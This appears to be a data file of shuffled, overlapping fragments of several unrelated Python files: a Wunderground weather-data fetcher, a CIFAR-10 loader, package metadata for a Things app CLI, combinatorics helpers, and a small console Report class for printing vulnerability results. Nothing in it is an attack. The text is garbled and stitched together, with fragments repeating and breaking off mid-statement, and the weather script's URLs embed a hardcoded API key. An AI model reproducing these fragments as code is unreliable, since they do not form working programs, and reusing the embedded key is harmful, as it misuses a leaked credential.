Inputs: coord:", "astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp", "print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData = None finally: return weatherData", "= parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise =", "''' Purpose: The purpose of this script is to retrieve meteorological data of", "+ \":\" + sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise':", "try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions =", "= sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset", "= parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr =", "with 5 keys. Assumptions: The wunderground API key is valid. ''' name =", "Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData = None finally: return", "#def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this script is to", "sys import os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this", "meteorological data of a given comma-separated latitude and longitute coordinates via the wunderground", "= m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp =", "F, sunrise time, sunset time. Returns: dictionary with 5 keys. Assumptions: The wunderground", "'sunset': sunset} except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData =", "country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve", "get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this script is to retrieve", "valid. ''' name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name)", "parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData = {'city': city, 'country':", "= urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read()", "Returns: dictionary with 5 keys. Assumptions: The wunderground API key is valid. '''", "is to retrieve meteorological data of a given comma-separated latitude and longitute coordinates", "is valid. ''' name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' +", "sunset = sunsetHr + \":\" + sunsetMin weatherData = {'city': city, 'country': country,", "+ sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset':", "keys. Assumptions: The wunderground API key is valid. ''' name = coord +", "comma-separated latitude and longitute coordinates via the wunderground API. Inputs: coord: string representing", "API. 
Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of city, country,", "sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute']", "sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData = {'city':", "import sys import os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of", "parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country", "parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin =", "in F, sunrise time, sunset time. Returns: dictionary with 5 keys. Assumptions: The", "via the wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple", "city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable", "= sunsetHr + \":\" + sunsetMin weatherData = {'city': city, 'country': country, 'temp':", "Assumptions: The wunderground API key is valid. ''' name = coord + '.json'", "get_data(coord): ''' Purpose: The purpose of this script is to retrieve meteorological data", "script is to retrieve meteorological data of a given comma-separated latitude and longitute", "parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour']", "= f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city =", "urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy", "os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this script is", "\":\" + sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise,", "def get_data(coord): ''' Purpose: The purpose of this script is to retrieve meteorological", "country, temp in F, sunrise time, sunset time. Returns: dictionary with 5 keys.", "of this script is to retrieve meteorological data of a given comma-separated latitude", "json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute']", "sunrise = sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour']", "= parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin", "conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city", "\":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr +", "coordinates via the wunderground API. Inputs: coord: string representing comma-separated coordinates. 
Outputs: weatherData:", "coordinates. Outputs: weatherData: tuple of city, country, temp in F, sunrise time, sunset", "name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m =", "Outputs: weatherData: tuple of city, country, temp in F, sunrise time, sunset time.", "retrieve meteorological data of a given comma-separated latitude and longitute coordinates via the", "weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except", "sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset =", "json import sys import os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose", "sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData", "sunrise time, sunset time. Returns: dictionary with 5 keys. Assumptions: The wunderground API", "time. Returns: dictionary with 5 keys. Assumptions: The wunderground API key is valid.", "coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' +", "= json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country =", "sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin", "wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of city,", "= urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions", "longitute coordinates via the wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs:", "representing comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp in F, sunrise", "of city, country, temp in F, sunrise time, sunset time. Returns: dictionary with", "name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy)", "Purpose: The purpose of this script is to retrieve meteorological data of a", "The wunderground API key is valid. ''' name = coord + '.json' try:", "and longitute coordinates via the wunderground API. Inputs: coord: string representing comma-separated coordinates.", "import urllib2 import json import sys import os #def get_wunderkey() def get_data(coord): '''", "of a given comma-separated latitude and longitute coordinates via the wunderground API. Inputs:", "parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" +", "tuple of city, country, temp in F, sunrise time, sunset time. Returns: dictionary", "city, country, temp in F, sunrise time, sunset time. 
Returns: dictionary with 5", "temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve data: \",", "m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f']", "sunset} except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData = None", "+ '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name)", "= parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\"", "country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise", "5 keys. Assumptions: The wunderground API key is valid. ''' name = coord", "<gh_stars>1-10 import urllib2 import json import sys import os #def get_wunderkey() def get_data(coord):", "key is valid. ''' name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/'", "parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin", "parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr", "+ name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions)", "given comma-separated latitude and longitute coordinates via the wunderground API. Inputs: coord: string", "urllib2 import json import sys import os #def get_wunderkey() def get_data(coord): ''' Purpose:", "except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData = None finally:", "this script is to retrieve meteorological data of a given comma-separated latitude and", "'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0])", "string representing comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp in F,", "name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy", "'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to", "sunset time. Returns: dictionary with 5 keys. Assumptions: The wunderground API key is", "data of a given comma-separated latitude and longitute coordinates via the wunderground API.", "'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve data:" ]
[ "to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data =", "i in files for m in [pattern.search(i)] if m] data = [] labels", "cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as", "re.compile('(data_batch_).') to_read = [m.group(0) for i in files for m in [pattern.search(i)] if", "open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels", "t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels'])", "data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is True:", "[m.group(0) for i in files for m in [pattern.search(i)] if m] data =", "labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data =", "pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in files for m in", "else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data'] labels =", "self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in files", "in [pattern.search(i)] if m] data = [] labels = [] for t in", "is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if", "True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in files for m", "'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels =", "= cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch')", "m in [pattern.search(i)] if m] data = [] labels = [] for t", "as f: d = cPickle.load(f) data = d['data'] labels = d['labels'] return data,", "= data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is", "= is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern =", "data = [] labels = [] for t in to_read: with open(self.data_path+'/'+t, 'rb')", "data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f:", "files for m in [pattern.search(i)] if m] data = [] labels = []", "to_read = [m.group(0) for i in files for m in [pattern.search(i)] if m]", "files = os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0)", "is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in files for", "in to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data", "re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training", "def load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read", "= [m.group(0) for i in files for m in [pattern.search(i)] if m] data", "__init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self): files =", 
"open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data'] labels = d['labels'] return", "np import os import re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True):", "in files for m in [pattern.search(i)] if m] data = [] labels =", "class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def", "self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern", "= [] for t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d =", "labels = [] for t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d", "= [] labels = [] for t in to_read: with open(self.data_path+'/'+t, 'rb') as", "os import re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path =", "if m] data = [] labels = [] for t in to_read: with", "self.data_path = data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training", "is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).')", "np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data", "= os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for", "as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels)", "numpy as np import os import re import cPickle class read_cifar10(object): def __init__(self,", "f: d = cPickle.load(f) data = d['data'] labels = d['labels'] return data, labels", "for t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data'])", "read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self):", "import re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path", "= np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f)", "if self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in", "m] data = [] labels = [] for t in to_read: with open(self.data_path+'/'+t,", "with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data'] labels = d['labels']", "as np import os import re import cPickle class read_cifar10(object): def __init__(self, data_path=None,", "for i in files for m in [pattern.search(i)] if m] data = []", "= re.compile('(data_batch_).') to_read = [m.group(0) for i in files for m in [pattern.search(i)]", "os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i", "f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else:", "def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self): files", "for m in [pattern.search(i)] if m] data = [] labels = [] for", "np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data'] labels", "import numpy as np import os import re import cPickle class 
read_cifar10(object): def", "import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training =", "with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data)", "[] for t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f)", "data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d =", "d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with", "cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training", "import os import re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path", "[] labels = [] for t in to_read: with open(self.data_path+'/'+t, 'rb') as f:", "[pattern.search(i)] if m] data = [] labels = [] for t in to_read:", "= np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data']", "labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d", "data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path)", "load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read =" ]
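A minimal usage sketch; the directory name below is an assumption, and the loader expects the extracted CIFAR-10 "python version" batches (data_batch_1..5 plus test_batch):

reader = read_cifar10(data_path='./cifar-10-batches-py', is_training=True)
data, labels = reader.load_data()
print(data.shape)    # (50000, 3072): five batches of 10000 flattened 32x32x3 images
print(labels.shape)  # (50000,)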
[ "read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__", "<NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__", "__author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache", "\"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\"", "= \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ = \"<EMAIL>\"", "= \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License", "CLI to read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021", "Python 3 CLI to read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__", "your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ =", "2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ = \"<EMAIL>\" __status__ = \"Development\"", "__license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ =", "3 CLI to read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ =", "<gh_stars>10-100 \"\"\"A simple Python 3 CLI to read your Things app data.\"\"\" __author__", "\"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\"", "= \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ =", "to read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\"", "__copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__", "data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ =", "= [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\"", "\"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ = \"<EMAIL>\" __status__", "__credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ =", "app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__", "\"\"\"A simple Python 3 CLI to read your Things app data.\"\"\" __author__ =", "simple Python 3 CLI to read your Things app data.\"\"\" __author__ = \"<NAME>\"", "[\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__", "License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ = \"<EMAIL>\" __status__ =", "Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"]" ]
[ "from .impl import ( BrokerHandler, ) from .ports import ( BrokerHandlerService, BrokerPort, )" ]
[ "= \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n == 0: return 1", "result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c'])) print(\"Subsets of ['a','b','c']:\", subsets(['a','b','c']))", "rest) _subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c']))", "_subsets(current, rest): if rest == []: result.append(current) return (first, *rest) = rest _subsets(current", "+ (first,), rest) _subsets(current, rest) _subsets((), lst) return result if __name__ == \"__main__\":", "(first,), rest) _subsets(current, rest) _subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations", "permute((), lst) return result def subsets(lst): result = [] def _subsets(current, rest): if", "0: return 1 else: return n * factorial(n-1) def permutations(lst): result = []", "rest == []: result.append(current) return for r in rest: permute(current + (r,), [i", "__author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n == 0: return", "def factorial(n): if n == 0: return 1 else: return n * factorial(n-1)", "in rest: permute(current + (r,), [i for i in rest if i !=", "[] def permute(current, rest): if rest == []: result.append(current) return for r in", "*rest) = rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return result", "_subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c'])) print(\"Subsets", "subsets(lst): result = [] def _subsets(current, rest): if rest == []: result.append(current) return", "rest): if rest == []: result.append(current) return for r in rest: permute(current +", "result.append(current) return (first, *rest) = rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((),", "r in rest: permute(current + (r,), [i for i in rest if i", "!= r]) permute((), lst) return result def subsets(lst): result = [] def _subsets(current,", "i in rest if i != r]) permute((), lst) return result def subsets(lst):", "1 else: return n * factorial(n-1) def permutations(lst): result = [] def permute(current,", "factorial(n-1) def permutations(lst): result = [] def permute(current, rest): if rest == []:", "\"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n == 0: return 1 else:", "= [] def permute(current, rest): if rest == []: result.append(current) return for r", "functions. \"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n ==", "return n * factorial(n-1) def permutations(lst): result = [] def permute(current, rest): if", "== []: result.append(current) return for r in rest: permute(current + (r,), [i for", "\"\"\" Various combinatorics functions. 
\"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n):", "in rest if i != r]) permute((), lst) return result def subsets(lst): result", "return result def subsets(lst): result = [] def _subsets(current, rest): if rest ==", "* factorial(n-1) def permutations(lst): result = [] def permute(current, rest): if rest ==", "[] def _subsets(current, rest): if rest == []: result.append(current) return (first, *rest) =", "+ (r,), [i for i in rest if i != r]) permute((), lst)", "def subsets(lst): result = [] def _subsets(current, rest): if rest == []: result.append(current)", "def permutations(lst): result = [] def permute(current, rest): if rest == []: result.append(current)", "\"2015-02-20\" def factorial(n): if n == 0: return 1 else: return n *", "Various combinatorics functions. \"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if", "[]: result.append(current) return for r in rest: permute(current + (r,), [i for i", "rest == []: result.append(current) return (first, *rest) = rest _subsets(current + (first,), rest)", "return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c'])) print(\"Subsets of ['a','b','c']:\",", "r]) permute((), lst) return result def subsets(lst): result = [] def _subsets(current, rest):", "factorial(n): if n == 0: return 1 else: return n * factorial(n-1) def", "= rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return result if", "[]: result.append(current) return (first, *rest) = rest _subsets(current + (first,), rest) _subsets(current, rest)", "n * factorial(n-1) def permutations(lst): result = [] def permute(current, rest): if rest", "if i != r]) permute((), lst) return result def subsets(lst): result = []", "= \"2015-02-20\" def factorial(n): if n == 0: return 1 else: return n", "return (first, *rest) = rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst)", "result def subsets(lst): result = [] def _subsets(current, rest): if rest == []:", "i != r]) permute((), lst) return result def subsets(lst): result = [] def", "__date__ = \"2015-02-20\" def factorial(n): if n == 0: return 1 else: return", "rest): if rest == []: result.append(current) return (first, *rest) = rest _subsets(current +", "[i for i in rest if i != r]) permute((), lst) return result", "= [] def _subsets(current, rest): if rest == []: result.append(current) return (first, *rest)", "rest) _subsets(current, rest) _subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations of", "(first, *rest) = rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return", "def permute(current, rest): if rest == []: result.append(current) return for r in rest:", "for r in rest: permute(current + (r,), [i for i in rest if", "if rest == []: result.append(current) return (first, *rest) = rest _subsets(current + (first,),", "== 0: return 1 else: return n * factorial(n-1) def permutations(lst): result =", "def _subsets(current, rest): if rest == []: result.append(current) return (first, *rest) = rest", "rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return result if __name__", "if n == 0: return 1 else: return n * factorial(n-1) def permutations(lst):", "else: return n * factorial(n-1) def permutations(lst): result = [] def permute(current, rest):", "permutations(lst): result = [] def permute(current, rest): if rest == []: result.append(current) return", "return 1 else: return n * 
factorial(n-1) def permutations(lst): result = [] def", "\"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n == 0:", "_subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return result if __name__ ==", "result = [] def _subsets(current, rest): if rest == []: result.append(current) return (first,", "lst) return result def subsets(lst): result = [] def _subsets(current, rest): if rest", "rest: permute(current + (r,), [i for i in rest if i != r])", "(r,), [i for i in rest if i != r]) permute((), lst) return", "combinatorics functions. \"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n", "result.append(current) return for r in rest: permute(current + (r,), [i for i in", "n == 0: return 1 else: return n * factorial(n-1) def permutations(lst): result", "rest if i != r]) permute((), lst) return result def subsets(lst): result =", "if rest == []: result.append(current) return for r in rest: permute(current + (r,),", "_subsets(current, rest) _subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\",", "== []: result.append(current) return (first, *rest) = rest _subsets(current + (first,), rest) _subsets(current,", "permute(current, rest): if rest == []: result.append(current) return for r in rest: permute(current", "for i in rest if i != r]) permute((), lst) return result def", "lst) return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c'])) print(\"Subsets of", "return for r in rest: permute(current + (r,), [i for i in rest", "result = [] def permute(current, rest): if rest == []: result.append(current) return for", "permute(current + (r,), [i for i in rest if i != r]) permute(()," ]
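Both helpers accumulate tuples into a list, so their sizes can be checked against the closed forms: n! permutations and 2**n subsets. The assertions below are illustrative, not part of the original module:

assert len(permutations([1, 2, 3])) == factorial(3)  # 3! = 6 orderings
assert len(subsets([1, 2, 3])) == 2 ** 3             # 8 subsets, counting () and the full set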
[ "if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL, msg, colours.ENDC)) else: print(msg)", "def __init__(self, msg, result=False): \"\"\" Handles the message and report it back to", "the message and report it back to console :param msg : String type", "back to console :param msg : String type message :param result : the", "<reponame>Marzooq13579/Hack-Gadgets from lib.colour import colours class Report: def __init__(self, msg, result=False): \"\"\" Handles", "result : the boolean object indicating if the url is vulnerable \"\"\" if", "to console :param msg : String type message :param result : the boolean", "colours class Report: def __init__(self, msg, result=False): \"\"\" Handles the message and report", "boolean object indicating if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL, msg,", ": String type message :param result : the boolean object indicating if the", "and report it back to console :param msg : String type message :param", "message :param result : the boolean object indicating if the url is vulnerable", "\"\"\" Handles the message and report it back to console :param msg 